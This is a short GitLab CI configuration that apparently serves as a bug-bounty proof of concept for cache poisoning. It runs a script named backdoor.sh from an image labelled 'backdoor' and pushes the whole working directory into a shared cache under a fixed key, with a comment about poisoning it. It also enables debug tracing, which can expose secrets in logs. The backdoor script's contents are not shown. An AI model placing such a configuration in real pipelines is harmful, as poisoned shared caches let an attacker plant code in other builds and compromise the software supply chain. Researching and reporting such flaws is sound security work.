image: gcr.io/gcp-bugbounty/backdoor

a:
  script:
  - bash /backdoor.sh
  - touch A
  cache:
    key: "meeee"
    policy: push #or push if you like to poison
    paths:
      - .
  variables:
    CI_DEBUG_TRACE: "true"

